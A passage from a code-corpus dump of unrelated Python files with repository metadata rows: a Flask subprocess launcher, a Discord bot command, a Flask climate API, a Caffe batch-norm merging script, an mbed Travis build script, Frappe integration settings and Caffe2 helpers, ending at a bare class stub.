import os
import shlex
import subprocess
from threading import Timer
def run(cmd, timeout_sec):
    """Run *cmd* (a shell-style command string), killing it after *timeout_sec* seconds.

    The child's stdout and stderr are captured and printed exactly once,
    whether the process finished on its own or was killed on timeout.
    The original version printed the output twice (try body and finally)
    and raised NameError in `finally` if communicate() itself failed.
    """
    proc = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    try:
        # communicate(timeout=...) replaces the hand-rolled threading.Timer:
        # it waits and raises TimeoutExpired, with no kill/cancel race.
        stdout, stderr = proc.communicate(timeout=timeout_sec)
    except subprocess.TimeoutExpired:
        proc.kill()
        # Collect whatever the process produced before it was killed.
        stdout, stderr = proc.communicate()
    print(stdout)
    print(stderr)
def parse_arguments():
    """Parse command-line options for the CLI Manager.

    Returns the argparse namespace; ``flask`` is True when the user asked
    to start the Core API backend.
    """
    arg_parser = argparse.ArgumentParser(
        description='CLI Manager for Core API application')
    arg_parser.add_argument(
        '--flask',
        required=False,
        default=False,
        action='store_true',
        help='Specifies whether to start Core API backend')
    return arg_parser.parse_args()
def main():
    # CLI entry point: report the parsed arguments and, when --flask was
    # given, launch the Flask backend as a child process.
    args = parse_arguments()
    print('All arguments passed to CLI Manager')
    print(args)
    if args.flask:
        print('Requested to run flask application, running...')
        # NOTE(review): the "> .../log.txt" redirection is passed as literal
        # argv entries (run() uses shlex + Popen without a shell), so no
        # redirection actually happens; the absolute log path is also
        # machine-specific -- confirm and fix both.
        cmd = "../../venv/bin/python app.py > /Users/demidovs/Documents/projects/1_hse/ldss-core-api/core_api/core_api/log.txt"
        cmds = shlex.split(cmd)
        print(cmds)
        # Examples: both take 1 second
        run(cmd, 1) # process ends normally at 1 second
        # res_process = subprocess.run(cmds,
        #                              capture_output=True,
        #                              # start_new_session=True,
        #                              env=dict(os.environ,
        #                                       **{
        #                                           'FLASK_ENV': 'development',
        #                                           'FLASK_APP': 'core_api',
        #                                       })
        #                              )
        # print(f'SUBPROCESS: {str(res_process.stdout.decode("utf-8"))}')
        # print(f'SUBPROCESS: {str(res_process.stderr.decode("utf-8"))}')
# Script entry point.
if __name__ == '__main__':
    main()
| 31.578125 | 127 | 0.515092 |
db5667b9812f82997105def14aca88b0e476dfc1 | 39 | py | Python | src/petronia/boot/util/__init__.py | groboclown/petronia | 486338023d19cee989e92f0c5692680f1a37811f | [
"MIT"
] | 19 | 2017-06-21T10:28:24.000Z | 2021-12-31T11:49:28.000Z | src/petronia/boot/util/__init__.py | groboclown/petronia | 486338023d19cee989e92f0c5692680f1a37811f | [
"MIT"
] | 10 | 2016-11-11T18:57:57.000Z | 2021-02-01T15:33:43.000Z | src/petronia/boot/util/__init__.py | groboclown/petronia | 486338023d19cee989e92f0c5692680f1a37811f | [
"MIT"
] | 3 | 2017-09-17T03:29:35.000Z | 2019-06-03T10:43:08.000Z |
"""
Utilities for the root stuff.
"""
| 7.8 | 29 | 0.615385 |
4dcfa7bb89b92c1a077cd0c8c51dd8412f2a6806 | 573 | py | Python | pug-bot/commands/addwin.py | stevenktruong/pug-bot | 315c21363eebb51d67d5b5c9fa9326cd8bcb2b54 | [
"MIT"
] | 17 | 2018-06-27T03:49:03.000Z | 2021-04-13T07:32:43.000Z | pug-bot/commands/addwin.py | stevenktruong/pug-bot | 315c21363eebb51d67d5b5c9fa9326cd8bcb2b54 | [
"MIT"
] | 3 | 2020-03-26T06:49:10.000Z | 2020-04-23T07:20:41.000Z | pug-bot/commands/addwin.py | stevenktruong/pug-bot | 315c21363eebb51d67d5b5c9fa9326cd8bcb2b54 | [
"MIT"
] | 14 | 2018-06-27T03:49:06.000Z | 2021-10-07T23:28:44.000Z | from .checks import *
from ..config import *
from ..pug import Pug
from ..utils import *
@check(have_no_pug, invalid_number)
async def addwin(message, pugs, user_input, client):
    # Record a win for one of the author's PUG teams.  The @check decorator
    # runs have_no_pug / invalid_number before this body -- presumably
    # guaranteeing an owned PUG exists and the argument is numeric
    # (confirm against checks.py).
    owned_pug = find_in_list(lambda pug: pug.owner == message.author, pugs)
    team_num = int(user_input["arguments"])
    # If the number is not in the correct range
    if not 1 <= team_num <= len(owned_pug.teams):
        return await message.channel.send(INVALID_NUMBER)
    # Update wins (teams are 1-indexed for the user)
    owned_pug.teams[team_num-1].wins += 1
    await update_status(message.channel, owned_pug)
9e4d51943c1085f0e22b2dd11d2882dafb09854d | 2,303 | py | Python | app.py | rkoshel/10-SQLAlchemy-Challenge_RK | fffd725e7a20978977146d421fe486420696a396 | [
"ADSL"
] | null | null | null | app.py | rkoshel/10-SQLAlchemy-Challenge_RK | fffd725e7a20978977146d421fe486420696a396 | [
"ADSL"
] | null | null | null | app.py | rkoshel/10-SQLAlchemy-Challenge_RK | fffd725e7a20978977146d421fe486420696a396 | [
"ADSL"
] | null | null | null | import numpy as np
import datetime as dt
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
# Reflect the Hawaii climate SQLite database and expose its two tables
# as mapped classes, then create the Flask application object.
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
Base = automap_base()
Base.prepare(engine, reflect=True)
measurement = Base.classes.measurement
station = Base.classes.station
app = Flask(__name__)
@app.route("/")
def welcome():
    """List available API routes"""
    route_lines = [
        "Available Routes:",
        "/precipitation",
        "/stations",
        "/tobs",
    ]
    # Same markup as the original concatenated f-strings: every line,
    # including the last, is followed by a <br/>.
    return "<br/>".join(route_lines) + "<br/>"
@app.route("/precipitation")
def precipitation():
    # Create a session and query precipitation and date data
    session = Session(engine)
    results = session.query(measurement.date, measurement.prcp).all()
    session.close()
    # Build a list of {"date": ..., "prcp": ...} dicts for the JSON payload
    precip = []
    for date, prcp in results:
        precip_dict = {}
        precip_dict["date"] = date
        precip_dict["prcp"] = prcp
        precip.append(precip_dict)
    return jsonify(precip)
@app.route("/stations")
def stations():
    """Return the list of station ids as JSON."""
    # Create a session to pull station information
    session = Session(engine)
    results2 = session.query(station.station).all()
    session.close()
    # Each query row is a 1-tuple like ('USC00519281',); unpack it so the
    # JSON payload carries the plain station id instead of a nested list.
    # (Local list renamed so it no longer shadows this view function.)
    station_records = []
    for (station_id,) in results2:
        station_dict = {}
        station_dict["station"] = station_id
        station_records.append(station_dict)
    return jsonify(station_records)
@app.route("/tobs")
def tobs():
    # Create a session to pull the last year of data for the most active
    # station (USC00519281); last date in the dataset is 2017-08-23.
    session = Session(engine)
    one_year_ago = dt.date(2017, 8, 23) - dt.timedelta(days = 365)
    results3 = session.query(measurement.date, measurement.tobs).\
        filter(measurement.date >= one_year_ago).\
        filter(measurement.station =='USC00519281').all()
    session.close()
    # Build a list of {"date": ..., "tobs": ...} dicts for the JSON payload
    # (note: the loop variable `tobs` shadows this view function's name).
    tobs_list = []
    for date, tobs in results3:
        tobs_dict = {}
        tobs_dict["date"] = date
        tobs_dict["tobs"] = tobs
        tobs_list.append(tobs_dict)
    return jsonify(tobs_list)
# Start the Flask development server when run directly.
if __name__ == '__main__':
    app.run(debug=True)
195e4f0d3a6ac01d68b0de7a4f340dbe40ae3dbb | 4,415 | py | Python | merge_bn.py | ZombieCait/MobileNet_SSD | bd209344296f40c3fdd2bbddc996a2e0bcd38efb | [
"MIT"
] | null | null | null | merge_bn.py | ZombieCait/MobileNet_SSD | bd209344296f40c3fdd2bbddc996a2e0bcd38efb | [
"MIT"
] | null | null | null | merge_bn.py | ZombieCait/MobileNet_SSD | bd209344296f40c3fdd2bbddc996a2e0bcd38efb | [
"MIT"
] | null | null | null | import os
import sys
import argparse
import logging
import numpy as np
try:
caffe_root = '/workspace/caffe/'
sys.path.insert(0, caffe_root + 'python')
import caffe
except ImportError:
logging.fatal("Cannot find caffe!")
from caffe.proto import caffe_pb2
from google.protobuf import text_format
def make_parser():
    """Build the CLI parser: both --model and --weights are required."""
    cli = argparse.ArgumentParser()
    for flag, descr in (
            ('--model', '.prototxt file for inference'),
            ('--weights', '.caffemodel file for inference')):
        cli.add_argument(flag, type=str, required=True, help=descr)
    return cli
# Maps a Convolution/Deconvolution layer name to the names of the
# BatchNorm/Scale layers that directly follow it (filled by the helpers below).
bn_maps = {}
def find_top_after_bn(layers, name, top):
    # Follow `top` through any BatchNorm -> Scale pair that consumes it,
    # recording the layer names under bn_maps[name]; return the final top
    # blob so the convolution can be rewired past the folded layers.
    bn_maps[name] = {}
    for l in layers:
        if len(l.bottom) == 0:
            continue
        if l.bottom[0] == top and l.type == "BatchNorm":
            bn_maps[name]["bn"] = l.name
            top = l.top[0]
        if l.bottom[0] == top and l.type == "Scale":
            bn_maps[name]["scale"] = l.name
            top = l.top[0]
    return top
def pre_process(expected_proto, new_proto):
    # Rewrite a prototxt for BN folding: drop every BatchNorm/Scale layer,
    # reconnect each Convolution/Deconvolution straight to the blob that
    # followed its BN pair, and force bias_term on so the folded bias has
    # somewhere to live.  Writes the result to `new_proto`.
    net_specs = caffe_pb2.NetParameter()
    net_specs2 = caffe_pb2.NetParameter()
    with open(expected_proto, "r") as fp:
        text_format.Merge(str(fp.read()), net_specs)
    # Copy everything, then strip the layer list and re-add selectively.
    net_specs2.MergeFrom(net_specs)
    layers = net_specs.layer
    num_layers = len(layers)
    for i in range(num_layers - 1, -1, -1):
        del net_specs2.layer[i]
    for idx in range(num_layers):
        l = layers[idx]
        if l.type == "BatchNorm" or l.type == "Scale":
            continue
        elif l.type == "Convolution" or l.type == "Deconvolution":
            top = find_top_after_bn(layers, l.name, l.top[0])
            bn_maps[l.name]["type"] = l.type
            layer = net_specs2.layer.add()
            layer.MergeFrom(l)
            layer.top[0] = top
            layer.convolution_param.bias_term = True
        else:
            layer = net_specs2.layer.add()
            layer.MergeFrom(l)
    with open(new_proto, "w") as fp:
        fp.write("{}".format(net_specs2))
def load_weights(net, nobn):
    # Copy weights from `net` (with BN) into `nobn` (BN-free), folding each
    # BatchNorm+Scale pair into the preceding conv:
    #   w' = w * gamma / sqrt(var + eps)
    #   b' = (b - mean) * gamma / sqrt(var + eps) + beta
    if sys.version_info > (3,0):
        listKeys = nobn.params.keys()
    else:
        listKeys = nobn.params.iterkeys()
    for key in listKeys:
        if type(nobn.params[key]) is caffe._caffe.BlobVec:
            conv = net.params[key]
            if key not in bn_maps or "bn" not in bn_maps[key]:
                # Layer has no BN pair: copy blobs through unchanged.
                for i, w in enumerate(conv):
                    nobn.params[key][i].data[...] = w.data
            else:
                print(key)
                bn = net.params[bn_maps[key]["bn"]]
                scale = net.params[bn_maps[key]["scale"]]
                wt = conv[0].data
                channels = 0
                # Output channels sit on axis 0 for Convolution and
                # axis 1 for Deconvolution.
                if bn_maps[key]["type"] == "Convolution":
                    channels = wt.shape[0]
                elif bn_maps[key]["type"] == "Deconvolution":
                    channels = wt.shape[1]
                else:
                    print("error type " + bn_maps[key]["type"])
                    exit(-1)
                bias = np.zeros(channels)
                if len(conv) > 1:
                    bias = conv[1].data
                # BN blobs: [0]=mean sum, [1]=variance sum, [2]=moving-average
                # scale factor; Scale blobs: [0]=gamma, [1]=beta.
                mean = bn[0].data
                var = bn[1].data
                scalef = bn[2].data
                scales = scale[0].data
                shift = scale[1].data
                # Caffe stores unnormalized statistics; divide by the factor.
                if scalef != 0:
                    scalef = 1. / scalef
                mean = mean * scalef
                var = var * scalef
                rstd = 1. / np.sqrt(var + 1e-5)
                # Broadcast the per-channel multiplier over the weight tensor.
                if bn_maps[key]["type"] == "Convolution":
                    rstd1 = rstd.reshape((channels,1,1,1))
                    scales1 = scales.reshape((channels,1,1,1))
                    wt = wt * rstd1 * scales1
                else:
                    rstd1 = rstd.reshape((1, channels,1,1))
                    scales1 = scales.reshape((1, channels,1,1))
                    wt = wt * rstd1 * scales1
                bias = (bias - mean) * rstd * scales + shift
                nobn.params[key][0].data[...] = wt
                nobn.params[key][1].data[...] = bias
# Script flow: strip BN/Scale from the prototxt, load both nets, fold the
# BN statistics into the conv weights, and save the merged caffemodel.
if __name__ == '__main__':
    parser1 = make_parser()
    args = parser1.parse_args()
    pre_process(args.model, "no_bn.prototxt")
    net = caffe.Net(args.model, args.weights, caffe.TEST)
    net2 = caffe.Net("no_bn.prototxt", caffe.TEST)
    load_weights(net, net2)
    net2.save("no_bn.caffemodel")
| 34.224806 | 100 | 0.526387 |
35d0a516cc0127e96dc9ee9cc43b234c522bdadd | 7,605 | py | Python | workspace_tools/build_travis.py | kaizen8501/mbed4ECO | 525c1f203539fef4144d5281d70f526f7a12af09 | [
"Apache-2.0"
] | 1 | 2018-11-01T03:46:39.000Z | 2018-11-01T03:46:39.000Z | workspace_tools/build_travis.py | hjjeon0608/mbed_for_W7500P | 08da4a338d32293d01a605bbcf350af98e058ca2 | [
"Apache-2.0"
] | null | null | null | workspace_tools/build_travis.py | hjjeon0608/mbed_for_W7500P | 08da4a338d32293d01a605bbcf350af98e058ca2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
"""
Travis-CI build script
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
################################################################################
# Configure builds here
# "libs" can contain "dsp", "rtos", "eth", "usb_host", "usb", "ublox", "fat"
build_list = (
{ "target": "LPC1768", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "eth", "usb_host", "usb", "ublox", "fat"] },
{ "target": "LPC2368", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "LPC2460", "toolchains": "GCC_ARM", "libs": ["rtos", "usb_host", "usb", "fat"] },
{ "target": "LPC11U24", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "OC_MBUINO", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "LPC11U24_301", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "NUCLEO_L053R8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_L152RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F030R8", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F070RB", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F072RB", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F091RC", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F103RB", "toolchains": "GCC_ARM", "libs": ["rtos", "fat"] },
{ "target": "NUCLEO_F302R8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F303RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F334R8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F401RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "MTS_MDOT_F405RG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos"] },
{ "target": "MTS_MDOT_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos"] },
{ "target": "MTS_DRAGONFLY_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "ARCH_MAX", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F051R8", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_F334C8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F401VC", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_F407VG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F429ZI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F746NG", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "LPC1114", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC11U35_401", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "UBLOX_C027", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC11U35_501", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "LPC11U68", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC11U37H_401", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "KL05Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "KL25Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "KL43Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "KL46Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "K20D50M", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "TEENSY3_1", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "K64F", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "LPC4088", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "ARCH_PRO", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC1549", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NRF51822", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
)
################################################################################
# Configure example test building (linking against external mbed SDK libraries liek fat or rtos)
linking_list = [
{"target": "LPC1768",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_15", "MBED_16", "MBED_17"],
"eth" : ["NET_1", "NET_2", "NET_3", "NET_4"],
"fat" : ["MBED_A12", "MBED_19", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
}
]
################################################################################
# Driver
def run_builds(dry_run):
    """Build the mbed SDK for every target/toolchain pair in `build_list`.

    Args:
        dry_run: when True, only print each build command instead of running it.

    Exits the process with status 1 as soon as one build command fails.
    """
    for build in build_list:
        toolchains = build["toolchains"]
        # A single toolchain may be given as a bare string; normalize to a list.
        if not isinstance(toolchains, list):
            toolchains = [toolchains]
        for toolchain in toolchains:
            cmdline = "python workspace_tools/build.py -m %s -t %s -j 4 -c --silent " % (
                build["target"], toolchain)
            libs = build.get("libs", [])
            if libs:
                cmdline = cmdline + " ".join("--" + lib for lib in libs)
            # print() with a single argument works under both Python 2 and 3
            # (the original py2-only `print "..."` statement is a SyntaxError in py3).
            print("Executing: " + cmdline)
            if not dry_run:
                if os.system(cmdline) != 0:
                    sys.exit(1)
def run_test_linking(dry_run):
    """Build and link simple mbed SDK tests against a few libraries to make
    sure there are no simple linking errors.

    Args:
        dry_run: when True, only print each make.py command instead of running it.

    Exits the process with status 1 as soon as one command fails.
    """
    for link in linking_list:
        toolchains = link["toolchains"]
        # A single toolchain may be given as a bare string; normalize to a list.
        if not isinstance(toolchains, list):
            toolchains = [toolchains]
        for toolchain in toolchains:
            tests = link["tests"]
            # Call make.py once per test group (per library switch).
            for test_lib in tests:
                test_names = tests[test_lib]
                test_lib_switch = "--" + test_lib if test_lib else ""
                cmdline = "python workspace_tools/make.py -m %s -t %s -c --silent %s -n %s " % (
                    link["target"], toolchain, test_lib_switch, ",".join(test_names))
                # py2/py3-compatible print (original used a py2 print statement).
                print("Executing: " + cmdline)
                if not dry_run:
                    if os.system(cmdline) != 0:
                        sys.exit(1)
def run_test_testsuite(dry_run):
    """Smoke-test the single-test driver by asking it for its version.

    Args:
        dry_run: when True, only print the command instead of running it.

    Exits the process with status 1 if the command fails.
    """
    cmdline = "python workspace_tools/singletest.py --version"
    # py2/py3-compatible print (original used a py2-only print statement).
    print("Executing: " + cmdline)
    if not dry_run:
        if os.system(cmdline) != 0:
            sys.exit(1)
if __name__ == "__main__":
    # "-s" on the command line means dry-run: print every command, execute none.
    run_builds("-s" in sys.argv)
    run_test_linking("-s" in sys.argv)
    run_test_testsuite("-s" in sys.argv)
| 51.385135 | 161 | 0.534385 |
d2f6453a53cec90313b36dd97d78be6cd2724fe7 | 2,619 | py | Python | frappe/config/integrations.py | AWDGroup/frappe | 9687384328012bf82a2784ab950c4f74a69b4ebe | [
"MIT"
] | 1 | 2019-05-21T04:55:01.000Z | 2019-05-21T04:55:01.000Z | frappe/config/integrations.py | AWDGroup/frappe | 9687384328012bf82a2784ab950c4f74a69b4ebe | [
"MIT"
] | 89 | 2017-09-19T15:17:44.000Z | 2022-03-31T00:52:42.000Z | frappe/config/integrations.py | AWDGroup/frappe | 9687384328012bf82a2784ab950c4f74a69b4ebe | [
"MIT"
] | 1 | 2018-02-08T01:14:48.000Z | 2018-02-08T01:14:48.000Z | from __future__ import unicode_literals
from frappe import _
def get_data():
    """Return the Integrations desk-module layout.

    The layout is a list of sections; each section has a translated label
    (and optionally an icon) plus a list of DocType shortcut cards.
    """

    def doctype_card(name, description):
        # Every entry on this page is a DocType shortcut of the same shape.
        return {"type": "doctype", "name": name, "description": description}

    payments = {
        "label": _("Payments"),
        "icon": "fa fa-star",
        "items": [
            doctype_card("Braintree Settings", _("Braintree payment gateway settings")),
            doctype_card("PayPal Settings", _("PayPal payment gateway settings")),
            doctype_card("Razorpay Settings", _("Razorpay Payment gateway settings")),
            doctype_card("Stripe Settings", _("Stripe payment gateway settings")),
        ],
    }

    backup = {
        "label": _("Backup"),
        "items": [
            doctype_card("Dropbox Settings", _("Dropbox backup settings")),
            doctype_card("S3 Backup Settings", _("S3 Backup Settings")),
        ],
    }

    authentication = {
        "label": _("Authentication"),
        "items": [
            doctype_card("Social Login Key",
                         _("Enter keys to enable login via Facebook, Google, GitHub.")),
            doctype_card("LDAP Settings", _("Ldap settings")),
            doctype_card("OAuth Client", _("Register OAuth Client App")),
            doctype_card("OAuth Provider Settings", _("Settings for OAuth Provider")),
        ],
    }

    webhook = {
        "label": _("Webhook"),
        "items": [
            doctype_card("Webhook", _("Webhooks calling API requests into web apps")),
            doctype_card("Slack Webhook URL", _("Slack Webhooks for internal integration")),
        ],
    }

    google_services = {
        "label": _("Google Services"),
        "items": [
            doctype_card("Google Maps", _("Google Maps integration")),
            doctype_card("GCalendar Settings", _("Configure your google calendar integration")),
            doctype_card("GCalendar Account", _("Configure accounts for google calendar")),
            doctype_card("GSuite Settings", _("Enter keys to enable integration with Google GSuite")),
            doctype_card("GSuite Templates", _("Google GSuite Templates to integration with DocTypes")),
        ],
    }

    return [payments, backup, authentication, webhook, google_services]
| 22.194915 | 82 | 0.534937 |
d99c6716bc0c544ea895e51025ed511dc28e31b5 | 4,905 | py | Python | detectron/lib/utils/c2.py | Tangshitao/Omni-supervised-Focal-Distillation | 3244dfa1a4d03e7311244687c1287b5ec26bd9ca | [
"MIT"
] | 58 | 2019-01-03T02:20:41.000Z | 2022-02-25T14:24:13.000Z | detectron/lib/utils/c2.py | Tangshitao/Omni-supervised-Focal-Distillation | 3244dfa1a4d03e7311244687c1287b5ec26bd9ca | [
"MIT"
] | 6 | 2019-02-12T03:52:08.000Z | 2020-12-17T02:40:37.000Z | detectron/lib/utils/c2.py | Tangshitao/Omni-supervised-Focal-Distillation | 3244dfa1a4d03e7311244687c1287b5ec26bd9ca | [
"MIT"
] | 5 | 2019-01-03T06:46:04.000Z | 2019-10-29T07:40:11.000Z | # Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""Helpful utilities for working with Caffe2."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from six import string_types
import contextlib
from caffe2.proto import caffe2_pb2
from caffe2.python import core
from caffe2.python import dyndep
from caffe2.python import scope
import utils.env as envu
def import_contrib_ops():
    """Import contrib ops needed by Detectron (currently the NCCL ops)."""
    envu.import_nccl_ops()


def import_detectron_ops():
    """Import Detectron ops by loading the Detectron ops shared library."""
    detectron_ops_lib = envu.get_detectron_ops_lib()
    dyndep.InitOpsLibrary(detectron_ops_lib)


def import_custom_ops():
    """Import custom ops by loading the custom ops shared library."""
    custom_ops_lib = envu.get_custom_ops_lib()
    dyndep.InitOpsLibrary(custom_ops_lib)
def SuffixNet(name, net, prefix_len, outputs):
    """Return a new Net keeping only the ops of `net` after the first
    `prefix_len` ops (i.e. a suffix of `net`), named `name`.

    Blobs listed in `outputs` must be defined in `net` and are registered as
    external output blobs of the new net.  Returns the new net together with
    the BlobReferences for `outputs` resolved against it.
    """
    outputs = BlobReferenceList(outputs)
    for out_blob in outputs:
        assert net.BlobIsDefined(out_blob)

    suffix_net = net.Clone(name)
    proto = suffix_net.Proto()
    del proto.op[:]
    del proto.external_input[:]
    del proto.external_output[:]

    # Keep only the suffix ops.
    proto.op.extend(net.Proto().op[prefix_len:])

    # Any blob read by a suffix op but never produced inside the suffix must
    # come from outside, so register it as an external input.
    undefined_inputs = [
        blob
        for op in proto.op
        for blob in op.input
        if not suffix_net.BlobIsDefined(blob)
    ]
    proto.external_input.extend(undefined_inputs)

    # Register the requested outputs as external outputs.
    output_names = [str(o) for o in outputs]
    proto.external_output.extend(output_names)
    return suffix_net, [suffix_net.GetBlobRef(o) for o in output_names]
def BlobReferenceList(blob_ref_or_list):
    """Normalize the argument to a list of BlobReferences.

    A single BlobReference is wrapped in a one-element list; a list/tuple is
    validated element-wise and returned as-is.  Anything else raises TypeError.
    """
    if isinstance(blob_ref_or_list, core.BlobReference):
        return [blob_ref_or_list]
    # Deliberately an exact type check (not isinstance), matching the original
    # contract: subclasses of list/tuple are rejected.
    if type(blob_ref_or_list) in (list, tuple):
        for blob_ref in blob_ref_or_list:
            assert isinstance(blob_ref, core.BlobReference)
        return blob_ref_or_list
    raise TypeError(
        'blob_ref_or_list must be a BlobReference or a list/tuple of '
        'BlobReferences'
    )
def UnscopeName(possibly_scoped_name):
    """Strip any name scoping from a (possibly) scoped name.

    For example, converts 'gpu_0/foo' to 'foo'.  Names that do not start with
    'gpu' are returned unchanged.
    """
    assert isinstance(possibly_scoped_name, string_types)
    if not possibly_scoped_name.startswith('gpu'):
        return possibly_scoped_name
    # Drop everything up to and including the first scope separator.  If no
    # separator is present, find() returns -1 and the full name is returned.
    sep_index = possibly_scoped_name.find(scope._NAMESCOPE_SEPARATOR)
    return possibly_scoped_name[sep_index + 1:]
@contextlib.contextmanager
def NamedCudaScope(gpu_id):
    """Combine a 'gpu_<id>' name scope with the matching CUDA device scope.

    Provided to reduce `with ...` nesting levels at call sites.
    """
    with GpuNameScope(gpu_id), CudaScope(gpu_id):
        yield
@contextlib.contextmanager
def NamedTeacherScope():
    """Create a 'teacher' name scope.

    NOTE(review): the original docstring was copy-pasted from NamedCudaScope;
    this context manager only sets a name scope, no CUDA device scope.
    """
    with core.NameScope('teacher'):
        yield


@contextlib.contextmanager
def GpuNameScope(gpu_id):
    """Create a name scope for GPU device `gpu_id` (e.g. 'gpu_0')."""
    with core.NameScope('gpu_{:d}'.format(gpu_id)):
        yield


@contextlib.contextmanager
def CudaScope(gpu_id):
    """Create a CUDA device scope for GPU device `gpu_id`."""
    gpu_dev = CudaDevice(gpu_id)
    with core.DeviceScope(gpu_dev):
        yield


@contextlib.contextmanager
def CpuScope():
    """Create a CPU device scope."""
    cpu_dev = core.DeviceOption(caffe2_pb2.CPU)
    with core.DeviceScope(cpu_dev):
        yield


def CudaDevice(gpu_id):
    """Create a CUDA DeviceOption for GPU `gpu_id`."""
    return core.DeviceOption(caffe2_pb2.CUDA, gpu_id)
def gauss_fill(std):
    """Shorthand for a Caffe2 GaussianFill initializer spec with stddev `std`."""
    return 'GaussianFill', {'std': std}
def const_fill(value):
    """Shorthand for a Caffe2 ConstantFill initializer spec with `value`."""
    return 'ConstantFill', {'value': value}
| 31.645161 | 80 | 0.699898 |
3af9ba29e7e85207d849078f76e2828b0508b19d | 243 | py | Python | testmile-setu/setu/dispatcher/guiauto/driver/impl/melement.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
] | 9 | 2018-11-15T10:09:17.000Z | 2021-01-12T05:59:19.000Z | testmile-setu/setu/dispatcher/guiauto/driver/impl/melement.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
] | 2 | 2019-07-01T15:33:46.000Z | 2019-07-12T13:04:08.000Z | testmile-setu/setu/dispatcher/guiauto/driver/impl/melement.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
] | 4 | 2018-12-02T15:14:04.000Z | 2020-05-28T12:57:24.000Z |
class MultiElement:
